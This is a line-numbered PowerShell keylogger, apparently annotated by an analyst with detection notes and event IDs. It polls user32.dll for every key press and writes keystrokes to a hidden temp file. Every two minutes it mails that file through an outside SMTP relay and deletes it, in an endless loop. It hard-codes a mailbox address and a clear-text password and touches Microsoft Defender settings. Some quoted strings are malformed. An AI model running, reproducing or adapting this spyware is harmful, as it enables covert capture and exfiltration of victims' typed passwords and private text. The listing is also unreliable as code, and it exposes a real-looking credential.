1############################
2#requires -Version 2
# One-shot flag: the driver loop at the bottom of the script tests it before calling
# Set-MpPreference and flips it to 'On' afterwards, so that call is issued on the first pass only.
3$antivir_state = 'Off'
4
# Start-KeyLogger: polls key state through user32.dll, appends each translated key press
# to the file at $Path, then mails that file and deletes it.
#   $Path - capture file; defaults to "$env:temp\Windows.tmp" and is created anew (-Force) on every call.
# Reads $TimeEnd, $ReportEmail and $SMTPInfo from the calling scope; none of them is a parameter.
# Detection notes: the Add-Type P/Invoke of GetAsyncKeyState / GetKeyboardState / ToUnicode is
# recorded by PowerShell script block logging (Event ID 4104); the capture file is short-lived
# in the user's temp directory and is removed right after the message is sent.
5function Start-KeyLogger($Path="$env:temp\Windows.tmp")
6{
7 # C# P/Invoke declarations for the user32.dll keyboard functions used below
8 $signatures = @'
9[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
10public static extern short GetAsyncKeyState(int virtualKeyCode);
11[DllImport("user32.dll", CharSet=CharSet.Auto)]
12public static extern int GetKeyboardState(byte[] keystate);
13[DllImport("user32.dll", CharSet=CharSet.Auto)]
14public static extern int MapVirtualKey(uint uCode, int uMapType);
15[DllImport("user32.dll", CharSet=CharSet.Auto)]
16public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
17'@
18
19 # compile the declarations into the type API.Win32 and keep a reference to it
20 $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
21
22 # create output file
23 $null = New-Item -Path $Path -ItemType File -Force
24
25 try
26 {
27
28 # timed capture loop, not an endless one: it runs while $TimeEnd (set by the caller)
29 # is not earlier than $TimeNow, which is refreshed at the bottom of every pass
30 while ($TimeEnd -ge $TimeNow) {
31 Start-Sleep -Milliseconds 40
32
33 # walk the codes 9..254; each is handed to GetAsyncKeyState as a virtual-key code
34 for ($ascii = 9; $ascii -le 254; $ascii++) {
35 # get current key state
36 $state = $API::GetAsyncKeyState($ascii)
37
38 # -32767 is 0x8001 as a 16-bit value: key is down and was pressed since the previous poll
39 if ($state -eq -32767) {
 # CapsLock state is read and discarded; its purpose is not evident from this listing
40 $null = [console]::CapsLock
41
42 # translate scan code to real code
43 $virtualKey = $API::MapVirtualKey($ascii, 3)
44
45 # get keyboard state for virtual keys
46 $kbstate = New-Object Byte[] 256
47 $checkkbstate = $API::GetKeyboardState($kbstate)
48
49 # prepare a StringBuilder to receive input key
50 $mychar = New-Object -TypeName System.Text.StringBuilder
51
52 # translate virtual key
53 $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
54
55 if ($success)
56 {
57 # append the translated character(s) to the capture file as UTF-16
58 [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
59 }
60 }
61 }
62 $TimeNow = Get-Date
63 }
64 }
65 finally
66 {
67 # runs on normal exit and on interruption: attach the capture file, send it over SMTP,
 # wait 10 s, dispose the message and delete the file (nothing in this listing opens Notepad).
 # Outbound SMTP from a PowerShell process, followed by deletion of a temp file, is the network/host trace.
68 $ReportEmail.Attachments.Add($Path)
69 $SMTPInfo.Send($ReportEmail)
70 start-sleep 10
71 $ReportEmail.Dispose()
72 Remove-Item -Path $Path -force
73 #exit 1
74 }
75}
76
77# Driver loop: never exits on its own. Each pass builds a fresh SMTP client and message,
78# sets a $TimeToRun-minute window, then calls Start-KeyLogger, which mails and deletes the capture file.
79# Start-KeyLogger
80while($true)
81{
 # pass counter; not read anywhere else in this listing
82 $i++
83 # Edit only this section!
 # length of one capture window in minutes (fed to AddMinutes below)
84 $TimeToRun = 2
85 $SMTPServer = 'mail.smtp2go.com' #smtp.gmail.com if you are using gmail
86 $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 2525) #2525 must be changed to 587 if you are using gmail
87 $SMTPInfo.EnableSsl = $true
 # Mailbox address and password are hard-coded in clear text; together with the relay host and
 # port above they are the indicators tied to this sample, and a password published this way
 # is to be treated as exposed.
88 $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential(ramasedang3@gmail.com', 'ZQCLHXrHEFOm');
89 $ReportEmail = New-Object System.Net.Mail.MailMessage
 # sender and recipient are the same mailbox
90 $ReportEmail.From = ramasedang3@gmail.com'
91 $ReportEmail.To.Add(ramasedang3@gmail.com')
92 $ReportEmail.Subject = 'Test Keyboard log'
93 $ReportEmail.Body = 'Attached is your keyboard log. '
94 $TimeStart = Get-Date
 # end of the capture window; Start-KeyLogger reads $TimeEnd from this scope
95 $TimeEnd = $timeStart.addminutes($TimeToRun)
 # Microsoft Defender preference change, issued once and guarded by $antivir_state.
 # A script-driven Set-MpPreference call that touches real-time monitoring is worth alerting on;
 # Defender records configuration changes in its operational log (Event ID 5007).
96 if($antivir_state -eq 'Off'){
97 Set-MpPreference -DisableRealtimeMonitoring $false
98 $antivir_state = 'On'
99 }
100 Start-KeyLogger
101}